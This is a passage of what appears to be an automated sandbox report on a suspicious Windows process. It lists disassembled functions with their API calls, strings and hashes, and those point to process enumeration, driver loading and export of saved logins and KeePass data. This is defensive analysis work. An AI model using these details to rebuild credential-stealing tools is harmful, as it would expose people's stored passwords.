                    • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                    • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                    Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                    • API String ID: 667068680-2887671607
                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                    Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfmemset$wcscpy$wcscat
                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                    • API String ID: 1607361635-601624466
                    • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                    • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                    Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintf$memset$wcscpy
                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                    • API String ID: 2000436516-3842416460
                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                    Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                    • String ID:
                    • API String ID: 1043902810-0
                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                    Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@_snwprintfwcscpy
                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                    • API String ID: 2899246560-1542517562
                    • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                    • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                    Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040DBCD
                    • memset.MSVCRT ref: 0040DBE9
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                    • wcscpy.MSVCRT ref: 0040DC2D
                    • wcscpy.MSVCRT ref: 0040DC3C
                    • wcscpy.MSVCRT ref: 0040DC4C
                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                    • wcscpy.MSVCRT ref: 0040DCC3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                    • API String ID: 3330709923-517860148
                    • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                    • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                    Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                    • memset.MSVCRT ref: 0040806A
                    • memset.MSVCRT ref: 0040807F
                    • _wtoi.MSVCRT ref: 004081AF
                    • _wcsicmp.MSVCRT ref: 004081C3
                    • memset.MSVCRT ref: 004081E4
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                    • String ID: logins$null
                    • API String ID: 3492182834-2163367763
                    • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                    • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                    Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    • memset.MSVCRT ref: 004085CF
                    • memset.MSVCRT ref: 004085F1
                    • memset.MSVCRT ref: 00408606
                    • strcmp.MSVCRT ref: 00408645
                    • _mbscpy.MSVCRT ref: 004086DB
                    • _mbscpy.MSVCRT ref: 004086FA
                    • memset.MSVCRT ref: 0040870E
                    • strcmp.MSVCRT ref: 0040876B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                    • String ID: ---
                    • API String ID: 3437578500-2854292027
                    • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                    • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                    Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0041087D
                    • memset.MSVCRT ref: 00410892
                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                    • GetSysColor.USER32(0000000F), ref: 00410999
                    • DeleteObject.GDI32(?), ref: 004109D0
                    • DeleteObject.GDI32(?), ref: 004109D6
                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                    • String ID:
                    • API String ID: 1010922700-0
                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                    Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                    • malloc.MSVCRT ref: 004186B7
                    • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                    • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                    • malloc.MSVCRT ref: 004186FE
                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$FullNamePath$malloc$Version
                    • String ID: |A
                    • API String ID: 4233704886-1717621600
                    • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                    • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                    Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp
                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                    • API String ID: 2081463915-1959339147
                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                    Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                    • API String ID: 2012295524-70141382
                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                    Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                    • API String ID: 667068680-3953557276
                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                    Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 004121FF
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                    • SelectObject.GDI32(?,?), ref: 00412251
                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                    • SetCursor.USER32(00000000), ref: 004122BC
                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                    • memcpy.MSVCRT ref: 0041234D
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                    • String ID:
                    • API String ID: 1700100422-0
                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                    Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                    • GetClientRect.USER32(?,?), ref: 004111E0
                    • GetWindowRect.USER32(?,?), ref: 004111F6
                    • GetWindowRect.USER32(?,?), ref: 0041120C
                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                    • GetWindowRect.USER32(00000000), ref: 0041124D
                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                    • String ID:
                    • API String ID: 552707033-0
                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                    Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                      • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                    • memcpy.MSVCRT ref: 0040C11B
                    • strchr.MSVCRT ref: 0040C140
                    • strchr.MSVCRT ref: 0040C151
                    • _strlwr.MSVCRT ref: 0040C15F
                    • memset.MSVCRT ref: 0040C17A
